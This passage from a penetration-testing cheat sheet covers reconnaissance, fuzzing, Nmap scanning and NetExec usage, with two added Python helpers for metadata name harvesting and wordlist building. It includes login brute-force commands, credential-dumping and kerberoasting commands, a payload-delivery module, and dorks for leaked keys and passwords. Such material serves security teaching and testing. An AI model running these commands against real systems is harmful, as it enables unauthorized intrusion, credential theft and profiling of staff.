httpx-toolkit -random-agent -json -o httpx_gau_results.json -threads 100 -timeout 3 -r resolvers.txt -l gau_results.txt
jq -r 'select(."status_code" | tostring | test("^2")).url' httpx_gau_results.json | sort -uf | tee -a gau_2xx_results.txt
jq -r 'select(."status_code" | tostring | test("^2|^4")).url' httpx_gau_results.json | sort -uf | tee -a gau_2xx_4xx_results.txt
jq -r 'select(."status_code" | tostring | test("^3")).url' httpx_gau_results.json | sort -uf | tee -a gau_3xx_results.txt
jq -r 'select(."status_code" | tostring | test("^401$")).url' httpx_gau_results.json | sort -uf | tee -a gau_401_results.txt
jq -r 'select(."status_code" | tostring | test("^403$")).url' httpx_gau_results.json | sort -uf | tee -a gau_403_results.txt
```

### urlhunter

**[`^ back to top ^`](#overview)**

Installation:

```
go install -v github.com/utkusen/urlhunter@latest
```

Gather URLs from URL shortening services:

```
urlhunter -o urlhunter_results.txt -date latest -keywords subdomains_live.txt
```

### wfuzz

**[`^ back to top ^`](#overview)**

Wfuzz was created to facilitate web application assessments and is based on a simple concept: it replaces any reference to the `FUZZ` keyword with the value of a given payload.

```
pipx install wfuzz
```

Let's search the subdomains with wfuzz:

```
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "" -H "Host: FUZZ." --hl 7
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ." -u http:// -t 100
wfuzz -H "Host: FUZZ." --hw 11 -c -z file,"/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt" http:///
```

Fuzz directories:

```
wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u https://somesite.com/WFUZZ -w directory-list-lowercase-2.3-medium.txt
```

Let's search the directories and files with wfuzz:

```
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt --sc 200,202,204,301,302,307,403 http:///FUZZ
```

Login form brute force. POST, single list, filter string (hide):

```
wfuzz -c -w users.txt --hs "Login name" -d "name=FUZZ&password=FUZZ&autologin=1&enter=Sign+in" http:///zabbix/index.php # Here we have filtered by line
```

Login form brute force. POST, 2 lists, filter code (show):

```
wfuzz.py -c -z file,users.txt -z file,pass.txt --sc 200 -d "name=FUZZ&password=FUZ2Z&autologin=1&enter=Sign+in" http:///zabbix/index.php # Here we have filtered by code
```

Login form brute force. GET, 2 lists, filter string (show), proxy, cookies:

```
wfuzz -c -w users.txt -w pass.txt --ss "Welcome " -p 127.0.0.1:8080:HTTP -b "PHPSESSIONID=1234567890abcdef;customcookie=hey" "http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in"
```

Cookie/Header brute force (vhost brute). Cookie, filter code (show), proxy:

```
wfuzz -c -w users.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "Cookie:id=1312321&user=FUZZ" "http://example.com/index.php"
```

Cookie/Header brute force (vhost brute).
User-Agent, filter code (hide), proxy:

```
wfuzz -c -w user-agents.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "User-Agent: FUZZ" "http://example.com/index.php"
```

Fuzz parameter values:

```
wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?someparam=WFUZZ" -w somewordlist.txt
wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/x-www-form-urlencoded" -u "https://somesite.com/someapi" -d "someparam=WFUZZ" -w somewordlist.txt
wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/json" -u "https://somesite.com/someapi" -d "{\"someparam\": \"WFUZZ\"}" -w somewordlist.txt
```

Fuzz parameter names:

```
wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?WFUZZ=somevalue" -w somewordlist.txt
wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/x-www-form-urlencoded" -u "https://somesite.com/someapi" -d "WFUZZ=somevalue" -w somewordlist.txt
wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/json" -u "https://somesite.com/someapi" -d "{\"WFUZZ\": \"somevalue\"}" -w somewordlist.txt
```

Additional example, internal SSRF fuzzing:

```
wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?url=127.0.0.1:WFUZZ" -w ports.txt
wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?url=WFUZZ:80" -w ips.txt
```

| Option | Description |
| --- | --- |
| -f | Store results in the output file |
| -t | Specify the number of concurrent connections (10 default) |
| -s | Specify the time delay between requests (0 default) |
| -u | Specify a URL for the request |
| -w | Specify a wordlist file |
| -X | Specify an HTTP method for the request, i.e., HEAD or FUZZ |
| -b | Specify a cookie for the requests |
| -d | Use POST data |
| -H | Use a header |
| --hc/--hl/--hw/--hh | Hide responses with the specified code/lines/words/chars |
| --sc/--sl/--sw/--sh | Show responses with the specified code/lines/words/chars |
| --ss/--hs | Show/hide responses with the specified regex within the content |

### Directory Fuzzing

**[`^ back to top ^`](#overview)**

**Don't forget that a GNU/Linux OS has a case-sensitive file system, so make sure to use the right wordlists.**

If you don't get any hits while brute forcing directories, try to brute force files by specifying file extensions.

The tools below support recursive directory and file search. They might also take a long time to finish, depending on the settings and wordlist used.

#### dirb

**[`^ back to top ^`](#overview)**

```
dirb http://target.com /path/to/wordlist
```

```
dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old
```

#### DirBuster

**[`^ back to top ^`](#overview)**

All of DirBuster's wordlists are located in the `/usr/share/dirbuster/wordlists/` directory.

#### Dirsearch

**[`^ back to top ^`](#overview)**

Let's search the directories with dirsearch:

```
dirsearch -u http://:port/ --exclude-status 403,404,400,401 -o dir
```

Let's search with file extensions:

```
dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old
```

```
dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist
```

```
dirsearch -u https://target.com -e .
```

#### feroxbuster **[`^ back to top ^`](#overview)**

Brute force directories on a web server, reading the target URLs from stdin, without recursion, and writing JSON results:

```
cat subdomains_live_long.txt | feroxbuster --stdin -k -n --auto-bail --random-agent -t 50 -T 3 --json -o feroxbuster_results.json -s 200,301,302,401,403 -w raft-small-directories-lowercase.txt
```

This tool is way faster than [DirBuster](#dirbuster).

Split the results by status code class. `--json` writes one JSON object per line, so `jq` can select on the `.status` field; `sort -uf` deduplicates case-insensitively:

```
jq -r 'select(.status | tostring | test("^2")).url' feroxbuster_results.json | sort -uf | tee -a directories_2xx.txt
jq -r 'select(.status | tostring | test("^2|^4")).url' feroxbuster_results.json | sort -uf | tee -a directories_2xx_4xx.txt
jq -r 'select(.status | tostring | test("^3")).url' feroxbuster_results.json | sort -uf | tee -a directories_3xx.txt
jq -r 'select(.status | tostring | test("^401$")).url' feroxbuster_results.json | sort -uf | tee -a directories_401.txt
jq -r 'select(.status | tostring | test("^403$")).url' feroxbuster_results.json | sort -uf | tee -a directories_403.txt
```

| Option | Description |
| --- | --- |
| -u | The target URL (required, unless --stdin \| --resume-from is used) |
| --stdin | Read URL(s) from STDIN |
| -a/-A | Set the User-Agent (default: feroxbuster/x.x.x) / use a random User-Agent |
| -x | File extension(s) to search for (ex: -x php -x pdf,js) |
| -m | Which HTTP request method(s) should be sent (default: GET) |
| --data | Request body; reads data from a file if the input starts with an @ (ex: @post.bin) |
| -H | HTTP headers to send with each request (ex: -H header:val -H 'stuff:things') |
| -b | HTTP cookies to send with each request (ex: -b stuff=things) |
| -Q | URL query parameters (ex: -Q token=stuff -Q secret=key) |
| -f | Append / to each request's URL |
| -s | Status codes to include (allow list) (default: 200,204,301,302,307,308,401,403,405) |
| -T | Number of seconds before a client request times out (default: 7) |
| -k | Disable TLS certificate validation for the client |
| -t | Number of concurrent threads (default: 50) |
| -n | Do not scan recursively |
| -w | Path to the wordlist |
| --auto-bail | Automatically stop scanning when an excessive amount of errors is encountered |
| -B | Automatically request likely backup extensions for "found" URLs (default: ~, .bak, .bak2, .old, .1) |
| -q | Hide progress bars and banner (good for tmux windows with notifications) |
| -o | Output file to write results to (use with --json for JSON entries) |

#### ffuf **[`^ back to top ^`](#overview)**

Directory fuzzing:

```
ffuf -u http:///FUZZ -w /usr/share/dirb/wordlists/common.txt -mc 200,204,301,302,307
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -u "http:///FUZZ" -c
```

Subdomain (virtual host) search with ffuf. `-fs 169` filters out the default-vhost response by its size; calibrate that number first by requesting a host name that cannot exist:

```
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "" -H "HOST: FUZZ." -c -fs 169
```

#### gobuster **[`^ back to top ^`](#overview)**

gobuster 3.x requires a mode (`dir`, `vhost`, `dns`, ...) as the first argument:

```
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/big.txt
```

Search for directories with gobuster. The parameters specify 128 threads (`-t`), the URL (`-u`), the wordlist (`-w`) and the extensions we are interested in (`-x`).
```
gobuster dir -t 128 -k -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,sh,cgi
gobuster dir -t 50 -k -u http://:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,301' -b '' --no-error
```

`-b ''` clears the default blacklist (404); gobuster 3.x refuses to run when both `-s` and a non-empty blacklist are set.

Search for virtual hosts (subdomains served by the same IP) with gobuster:

```
gobuster vhost -u -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -k
gobuster vhost -u -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain -t 20
```

If a DNS server shows up among the open ports, brute force subdomains against it directly (`-r` sets the resolver):

```
gobuster dns -d -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r :53
```

### Google Dorks **[`^ back to top ^`](#overview)**

Google Dork databases:

* [exploit-db.com/google-hacking-database](https://www.exploit-db.com/google-hacking-database)
* [cxsecurity.com/dorks](https://cxsecurity.com/dorks)
* [pentest-tools.com/information-gathering/google-hacking](https://pentest-tools.com/information-gathering/google-hacking)
* [opsdisk/pagodo/blob/master/dorks/all_google_dorks.txt](https://github.com/opsdisk/pagodo/blob/master/dorks/all_google_dorks.txt)

Check the registered list of `/.well-known/` URIs [here](https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml).

Google does not crawl paths that are disallowed in `robots.txt`, so dorking will usually not surface those directories and files; to check them, fetch `robots.txt` yourself and probe the entries with [httpx](#httpx).

Append `site:www.somedomain.com` to limit your scope to a specified subdomain. Append `site:*.somedomain.com` to limit your scope to all subdomains. Append `site:*.somedomain.com -www` to exclude the `www` subdomain from the results.
Simple Google Dorks:

```
inurl:/robots.txt intext:disallow ext:txt
inurl:/.well-known/security.txt ext:txt
inurl:/info.php intext:"php version" ext:php
intitle:"index of /" intext:"parent directory"
intitle:"index of /.git" intext:"parent directory"
inurl:/gitweb.cgi
intitle:"Dashboard [Jenkins]"
(intext:"mysql database" AND intext:db_password) ext:txt
intext:-----BEGIN PGP PRIVATE KEY BLOCK----- (ext:pem OR ext:key OR ext:txt)
```

### Chad **[`^ back to top ^`](#overview)**

Find and download files using a Google Dork:

```
mkdir chad_downloads
chad -nsos -o chad_downloads_results.json -dir chad_downloads -tr 200 -q "ext:txt OR ext:json OR ext:yml OR ext:pdf OR ext:doc OR ext:docx OR ext:xls OR ext:xlsx OR ext:zip OR ext:tar OR ext:rar OR ext:gzip OR ext:7z" -s *.somedomain.com
```

Extract authors (and more) from the downloaded files' metadata:

```
apt -y install libimage-exiftool-perl
exiftool -S chad_downloads | grep -Po '(?<=Author\:\ ).+' | sort -uf | tee -a people.txt
```

Find directory listings using a Google Dork:

```
chad -nsos -o chad_directory_listings_results.json -tr 200 -q 'intitle:"index of /" intext:"parent directory"' -s *.somedomain.com
```

More about the project at [ivan-sincek/chad](https://github.com/ivan-sincek/chad).

### PhoneInfoga **[`^ back to top ^`](#overview)**

Download the latest version from [GitHub](https://github.com/sundowndev/phoneinfoga/releases) and check how to [install](#0-install-and-setup-tools) the tool.

Get information about a phone number:

```
phoneinfoga scan -n +1111111111
```

To use the web UI instead, start PhoneInfoga's web server (see the project's documentation) and navigate to `http://localhost:5000` with your preferred web browser.
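Following on from the Chad and exiftool pipeline above: the `grep` there only collects the `Author` tag, while Office, PDF and image files carry people's names in several other tags too. The script below is an added example (not part of this cheat sheet, of Chad, or of exiftool) that parses `exiftool -S` output, pulls names from `Author`, `Creator`, `LastModifiedBy` and `Artist`, drops values that are obviously software, deduplicates case-insensitively like `sort -uf`, and also collects e-mail addresses. The sample input is constructed, and the software-keyword list is a heuristic of my own, not an exiftool feature.

```python
import re
from collections import OrderedDict

# Tags that commonly carry a person's name (Office, PDF and image metadata).
PEOPLE_TAGS = ("Author", "Creator", "LastModifiedBy", "Artist")
# Heuristic (assumption): values containing these words are tools, not people.
SOFTWARE_HINTS = ("microsoft", "adobe", "libreoffice", "openoffice", "acrobat", "word", "excel")

# Constructed sample of `exiftool -S chad_downloads` output: one "Tag: value"
# per line and a "======== path" separator before each file.
SAMPLE = """\
======== chad_downloads/report.pdf
FileName: report.pdf
Author: Jane Doe
Creator: Microsoft Word
Producer: Adobe PDF Library 15.0
======== chad_downloads/budget.xlsx
FileName: budget.xlsx
Creator: John Smith
LastModifiedBy: jane doe
Company: Somedomain Inc.
======== chad_downloads/logo.jpg
FileName: logo.jpg
Artist: Alex Roe <alex.roe@somedomain.com>
    3 image files read
"""


def parse_exiftool_short(text):
    """Return {path: {tag: value}} from `exiftool -S` output."""
    files, current = OrderedDict(), None
    for line in text.splitlines():
        if line.startswith("======== "):
            current = line[len("======== "):].strip()
            files[current] = {}
            continue
        m = re.match(r"^([A-Za-z0-9_-]+): (.*)$", line)
        if m and current is not None:
            files[current][m.group(1)] = m.group(2).strip()
    return files


def looks_like_software(value):
    lowered = value.lower()
    return any(hint in lowered for hint in SOFTWARE_HINTS)


def extract_people(text):
    """Names from people-bearing tags, deduplicated case-insensitively (like `sort -uf`)."""
    seen, people = set(), []
    for tags in parse_exiftool_short(text).values():
        for tag in PEOPLE_TAGS:
            value = tags.get(tag)
            if not value or looks_like_software(value):
                continue
            name = re.sub(r"\s*<[^>]+>\s*$", "", value)  # drop a trailing <email>
            key = name.casefold()
            if key not in seen:  # first spelling wins, later case variants are dropped
                seen.add(key)
                people.append(name)
    return sorted(people, key=str.casefold)


def extract_emails(text):
    """Every e-mail address anywhere in the metadata, lowercased and deduplicated."""
    return sorted({m.lower() for m in re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", text)})


if __name__ == "__main__":
    # Real use: exiftool -S chad_downloads > exif.txt; python3 this.py < exif.txt
    for person in extract_people(SAMPLE):
        print(person)
    for email in extract_emails(SAMPLE):
        print(email)
```

Feed the output into `people.txt` the same way as the one-liner; the names are the raw material for username-format guessing later, so keep the original capitalisation.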
### git-dumper **[`^ back to top ^`](#overview)**

Try to reconstruct a Git repository (i.e., recover the source code and its commit history) from a `/.git` directory exposed on a web server:

```
# git-dumper
git-dumper https://somesite.com/.git git_dumper_results
```

This tool might not be able to reconstruct the whole repository every time, but even a partial dump can reveal sensitive information. Some additional `git` commands to run inside the dumped repository to inspect the history and restore the working tree:

```
git status
git log
git checkout -- .
git restore .
```

Use [Google Dorking](#google-dorks) and [Chad](#chad) to find more targets.

### TruffleHog **[`^ back to top ^`](#overview)**

Installation:

```
git clone https://github.com/trufflesecurity/trufflehog && cd trufflehog
go install
```

Search for sensitive information inside a single repository or a whole organization on GitHub (`--only-verified` keeps only credentials TruffleHog could validate against the provider):

```
trufflehog git https://github.com/trufflesecurity/test_keys --only-verified --json
trufflehog github --org=trufflesecurity --only-verified --json
```

Search for sensitive information inside files and directories:

```
trufflehog filesystem somefile_1.txt somefile_2.txt somedir1 somedir2
```

### katana **[`^ back to top ^`](#overview)**

Installation:

```
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
```

Crawl a website (or a list of live URLs), including JavaScript parsing (`-jc`) and passive sources (`-ps`):

```
katana -timeout 3 -retry 1 -c 30 -o katana_results.txt -ps -jc -iqp -d 1 -u https://somesite.com/home
katana -timeout 3 -retry 1 -c 30 -o katana_results.txt -ps -jc -iqp -d 1 -u subdomains_live_long_2xx.txt
```

### Scrapy Scraper **[`^ back to top ^`](#overview)**

Crawl a website, then download and beautify minified JavaScript files:

```
scrapy-scraper -cr 30 -a random -o scrapy_scraper_results.txt -p -r 1 -dir somedir -u https://somesite.com/home
scrapy-scraper -cr 30 -a random -o scrapy_scraper_results.txt -p -r 1 -dir somedir -u subdomains_live_long_2xx.txt
```

In case you get no results while using Playwright's headless browser, try updating it:

```
pip3 install --upgrade playwright
playwright install chromium
```

Scan the downloaded JavaScript files for sensitive information using [TruffleHog](#trufflehog).

### snallygaster **[`^ back to top ^`](#overview)**

Download the latest version from [GitHub](https://github.com/hannob/snallygaster/releases). See how to [install](#0-install-and-setup-tools) the tool.

Search a web server for sensitive files:

```
snallygaster --nowww somesite.com | tee snallygaster_results.txt
for subdomain in $(cat subdomains_live_short_http.txt); do snallygaster --nohttps --nowww "${subdomain}"; done | tee snallygaster_http_results.txt
for subdomain in $(cat subdomains_live_short_https.txt); do snallygaster --nohttp --nowww "${subdomain}"; done | tee snallygaster_https_results.txt
```

### IIS Tilde Short name Scanning **[`^ back to top ^`](#overview)**

Download:

```
git clone https://github.com/irsdl/IIS-ShortName-Scanner && cd IIS-ShortName-Scanner/release
```

Search an IIS server for files and directories via the 8.3 short-name disclosure:

```
java -jar iis_shortname_scanner.jar 2 30 https://somesite.com
```

### WhatWeb **[`^ back to top ^`](#overview)**

Identify the technologies behind a website:

```
whatweb -v somesite.com
```

### Parsero **[`^ back to top ^`](#overview)**

Test all `robots.txt` entries:

```
parsero -sb -u somesite.com
```

### EyeWitness **[`^ back to top ^`](#overview)**

Grab screenshots from websites:

```
eyewitness --no-prompt --no-dns --threads 5 --timeout 3 -d eyewitness_results -f subdomains_live_long.txt
```

To check the screenshots, navigate to the `eyewitness_results/screens` directory.
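Generic wordlists are a good start, but the crawl output from katana or Scrapy Scraper above already tells you how the target names things. The script below is an added example (not part of this cheat sheet or of any of the tools it lists) that turns a list of crawled URLs, one per line as `katana -o` writes it, into target-specific wordlists for ffuf, feroxbuster, dirsearch or gobuster: directory names, file names, extensions (for `-x`/`-e`) and query parameter names (for parameter fuzzing with wfuzz). It keeps case by default because of the case-sensitivity warning in the Directory Fuzzing section, and only folds to lowercase when you tell it the target is case-insensitive. The sample crawl and host `somesite.com` are constructed.

```python
from urllib.parse import parse_qsl, urlsplit

# Constructed sample of a crawl result (one absolute URL per line).
SAMPLE_CRAWL = """\
https://somesite.com/home
https://somesite.com/Admin/login.php
https://somesite.com/admin/Login.php?next=/dashboard
https://somesite.com/api/v2/users?id=42&format=json
https://somesite.com/static/js/app.min.js
https://somesite.com/static/js/app.min.js?v=3
https://cdn.other-site.net/lib/jquery.js
https://somesite.com/uploads/2023/report_final.PDF
javascript:void(0)
"""


def build_wordlists(urls, scope_host, lowercase=False):
    """Return {"dirs", "files", "exts", "params"} as sorted, deduplicated lists.

    lowercase=True folds case, which is right for a case-insensitive target
    (IIS on Windows) but loses information on a case-sensitive Linux file
    system, where /Admin/ and /admin/ are different paths.
    """
    dirs, files, exts, params = set(), set(), set(), set()
    for raw in urls:
        raw = raw.strip()
        if not raw:
            continue
        u = urlsplit(raw)
        # Skip javascript:/mailto: pseudo-URLs and out-of-scope hosts.
        if u.scheme not in ("http", "https") or u.netloc.lower() != scope_host.lower():
            continue
        segments = [s for s in u.path.split("/") if s]
        if segments and "." in segments[-1]:
            # Last segment with a dot is treated as a file; everything before it as directories.
            files.add(segments[-1])
            exts.add(segments[-1].rsplit(".", 1)[1])
            segments = segments[:-1]
        dirs.update(segments)
        params.update(k for k, _ in parse_qsl(u.query, keep_blank_values=True))
    norm = str.lower if lowercase else (lambda s: s)
    return {
        "dirs": sorted({norm(d) for d in dirs}),
        "files": sorted({norm(f) for f in files}),
        "exts": sorted({norm(e) for e in exts}),
        "params": sorted(params),  # parameter names are matched by the app, not the FS
    }


def write_wordlists(lists, prefix="custom"):
    """Write <prefix>_dirs.txt, <prefix>_files.txt, ... one entry per line, ready for -w."""
    for name, words in lists.items():
        with open(f"{prefix}_{name}.txt", "w", encoding="utf-8") as fh:
            fh.write("\n".join(words) + "\n")


if __name__ == "__main__":
    # Real use: build_wordlists(open("katana_results.txt"), "somesite.com")
    lists = build_wordlists(SAMPLE_CRAWL.splitlines(), "somesite.com")
    for name, words in lists.items():
        print(f"{name}: {words}")
    write_wordlists(lists)
```

Run it after a crawl, then pass `custom_dirs.txt` to `ffuf -w`, join `custom_exts.txt` with commas for `gobuster -x`, and use `custom_params.txt` as the wordlist in the wfuzz parameter-name examples; the generic SecLists wordlists still go in a second pass.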
### Wordlists **[`^ back to top ^`](#overview)**

You can find `rockyou.txt` inside the `/usr/share/wordlists/` directory or inside [SecLists](https://github.com/danielmiessler/SecLists), a useful collection of many types of wordlists for security assessments.

Install SecLists (the collection will be stored in the `/usr/share/seclists/` directory):

```
apt update && apt install seclists
```

Other popular wordlist collections:

* [ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths)
* [xmendez/wfuzz](https://github.com/xmendez/wfuzz)
* [assetnote/commonspeak2-wordlists](https://github.com/assetnote/commonspeak2-wordlists)
* [weakpass.com/wordlist](https://weakpass.com/wordlist)
* [packetstormsecurity.com/Crackers/wordlists](https://packetstormsecurity.com/Crackers/wordlists)

## 2. Scanning/Enumeration **[`^ back to top ^`](#overview)**

### 2.1 Useful Websites **[`^ back to top ^`](#overview)**

* [ipaddressguide.com/cidr](https://www.ipaddressguide.com/cidr) – CIDR to IP range conversion.
* [account.arin.net/public/cidrCalculator](https://account.arin.net/public/cidrCalculator) – ARIN CIDR calculator.
* [calculator.net/ip-subnet-calculator.html](https://www.calculator.net/ip-subnet-calculator.html) – subnet mask calculator.
* [subnet-calculator.com/cidr.php](http://www.subnet-calculator.com/cidr.php) – IP subnet and CIDR calculator.
* [speedguide.net/ports.php](https://www.speedguide.net/ports.php) – TCP/UDP port database.
* [securityheaders.com](https://securityheaders.com) – HTTP security headers check.
* [csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) – Content Security Policy evaluator.
* [mxtoolbox.com/blacklists.aspx](https://mxtoolbox.com/blacklists.aspx) – check an IP/domain against blacklists.

### masscan **[`^ back to top ^`](#overview)**

Scan all TCP and UDP ports from interface `tun0` at 1000 packets per second.
```
masscan -e tun0 -p1-65535,U:1-65535 --rate=1000
```

### rustscan **[`^ back to top ^`](#overview)**

Fast scan of all ports, handing the open ones to Nmap (everything after `--` is passed to Nmap):

```
rustscan --ulimit=5000 --range=1-65535 -a -- -A -sC
```

### Nmap **[`^ back to top ^`](#overview)**

Ping sweep, map live hosts:

```
nmap -sn -n 192.168.8.0/24 | grep for | cut -d" " -f5
nmap -sn -oG nmap_ping_sweep_results.txt 192.168.8.0/24
nmap -sn -oG nmap_ping_sweep_results.txt -iL cidrs.txt
```

Extract live hosts from the grepable results:

```
grep -Po '(?<=Host\:\ )[^\s]+' nmap_ping_sweep_results.txt | sort -uf | tee -a ips_live.txt
```

Quick scan:

```
nmap -T4 -F 192.168.8.0/24
nmap -sV -T4 -O -F --version-light 192.168.8.0/24
```

TCP scan, all ports:

```
nmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- 192.168.8.0/24
nmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- -iL cidrs.txt
```

Automate the TCP scan, one output file per host:

```
mkdir nmap_tcp_results
for ip in $(cat ips_live.txt); do nmap -nv -sS -sV -sC -Pn -oN "nmap_tcp_results/nmap_tcp_results_${ip//./_}.txt" -p- "${ip}"; done
```

SYN (half-open) scan, commonly called a stealth scan:

```
nmap -sS $ip
```

Only open ports and banner grab:

```
nmap -n -Pn -sS $ip --open -sV
```

FIN scan (can slip past stateless packet filters; unreliable against Windows hosts, which answer every probe with RST):

```
nmap -sF $ip
```

UDP scan, only important ports:

```
nmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 192.168.8.0/24
nmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 -iL cidrs.txt
```

Automate the UDP scan:

```
mkdir nmap_udp_results
for ip in $(cat ips_live.txt); do nmap -nv -sU -sV -sC -Pn -oN "nmap_udp_results/nmap_udp_results_${ip//./_}.txt" -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 "${ip}"; done
```

Slow scan of all ports:

```
nmap --privileged -sV -sC -sS -p- -oN nmap $ip
```

To get more information about the services running on the open ports, run an Nmap scan with the `-A` option.
```
nmap -A -sV -sC $ip -p80,135,139,445
```

No ping, no DNS resolution, show only open ports, all TCP ports:

```
nmap -n -Pn -sS -A $ip --open -p-
```

Nmap verbose scan: SYN scan, `T4` timing, OS and service version detection, traceroute and default scripts against the services:

```
nmap -v -sS -A -T4 $ip
```

OS fingerprint scan:

```
nmap -O $ip
```

Output to a file (`-oA` writes normal, XML and grepable formats at once):

```
nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip
nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 192.168.8.0/24
```

| Option | Description |
| --- | --- |
| -sn | Ping scan – disable port scan |
| -Pn | Treat all hosts as online – skip host discovery |
| -n/-R | Never do DNS resolution/Always resolve (default: sometimes) |
| -sS/sT/sA | TCP SYN/Connect()/ACK |
| -sU | UDP scan |
| -p/-p- | Only scan specified ports/Scan all ports |
| --top-ports | Scan most common ports |
| -sV | Probe open ports to determine service/version info |
| -O | Enable OS detection |
| -sC | Same as --script=default |
| --script | Script scan (takes time to finish) |
| --script-args | Provide arguments to scripts |
| --script-help | Show help about scripts |
| -oN/-oX/-oG | Output scan in normal, XML, and grepable format |
| -v | Increase verbosity level (use -vv or more for greater effect) |
| --reason | Display the reason a port is in a particular state |
| -A | Enable OS detection, version detection, script scanning, and traceroute |

NSE examples:

```
nmap -nv --script='mysql-brute' --script-args='userdb="users.txt", passdb="rockyou.txt"' 192.168.8.5 -p 3306
nmap -nv --script='dns-brute' --script-args='dns-brute.domain="somedomain.com", dns-brute.hostlist="subdomains-top1mil.txt"'
nmap -nv --script='ssl-heartbleed' -iL cidrs.txt
```

### NetExec **[`^ back to top ^`](#overview)**

Installation via pipx:

```
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
```

Installation via Poetry:

```
apt install -y libssl-dev libffi-dev python-dev-is-python3 build-essential
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
poetry install
poetry run NetExec
```

List the modules available per protocol:

```
netexec ldap -L
netexec mysql -L
netexec smb -L
netexec ssh -L
netexec winrm -L
```

Common commands. Supply the target host or CIDR and the credentials (`-u`/`-p`, or `-H` for an NT hash) in each command:

```
netexec smb -u '' -p '' --shares
netexec smb -u '' -p '' --shares -M spider_plus
netexec smb -u '' -p '' --shares -M spider_plus -o READ_ONLY=false
netexec smb -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true
netexec smb -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true MAX_FILE_SIZE=99999999
netexec smb -u '' -p '' --share --get-file
netexec smb -u 'guest' -p '' --shares --rid-brute
netexec smb -u 'guest' -p '' --shares --rid-brute 100000
netexec smb -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}'
netexec smb -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\\' '{print $2}'
netexec smb -u '' --use-kcache --users
netexec smb -u '' --use-kcache --sam
netexec smb -u '' -p '' --shares
netexec smb -u '' -p '' --shares --dir
netexec smb -u '' -p '' --shares --dir "FOLDER"
netexec smb -u '' -p '' --sam
netexec smb -u '' -p '' --lsa
netexec smb -u '' -p '' --dpapi
netexec smb -u '' -p '' --local-auth --sam
netexec smb -u '' -p '' --local-auth --lsa
netexec smb -u '' -p '' --local-auth --dpapi
netexec smb -u '' -p '' -M enum_av
netexec smb -u '' -p '' -M wcc
netexec smb -u '' -p '' -M snipped
netexec smb -u '' -p '' -M lsassy
netexec smb -u '' -p '' -M backup_operator
netexec smb -u '' -p '' -M web_delivery -o URL=http:///
netexec smb -u '' -p '' -M gpp_autologin
netexec smb -u '' -p '' -M gpp_password
netexec smb -u '' -p '' -M powershell_history
netexec smb -u '' -p '' -M coerce_plus -o LISTENER=
netexec smb -u '' -p '' --ntds
netexec smb -u '' -H '' --ntds
netexec smb -u '' -p '' --ntds --user
netexec smb -u '' -H '' --ntds --user
netexec smb -u '' -H '' -x "whoami"
netexec smb /PATH/TO/FILE/ --gen-relay-list
netexec ldap -u '' -p '' -M user-desc
netexec ldap -u '' -p '' -M get-desc-users
netexec ldap -u '' -p '' -M ldap-checker
netexec ldap -u '' -p '' -M veeam
netexec ldap -u '' -p '' -M maq
netexec ldap -u '' -p '' -M adcs
netexec ldap -u '' -p '' -M zerologon
netexec ldap -u '' -p '' -M petitpotam
netexec ldap -u '' -p '' -M nopac
netexec ldap -u '' -p '' --use-kcache -M whoami
netexec ldap -u '' -p '' --kerberoasting hashes.kerberoasting
netexec ldap -u '' -p '' --asreproast hashes.asreproast
netexec ldap -u '' -p '' --gmsa
netexec ldap -u '' -p '' --gmsa -k
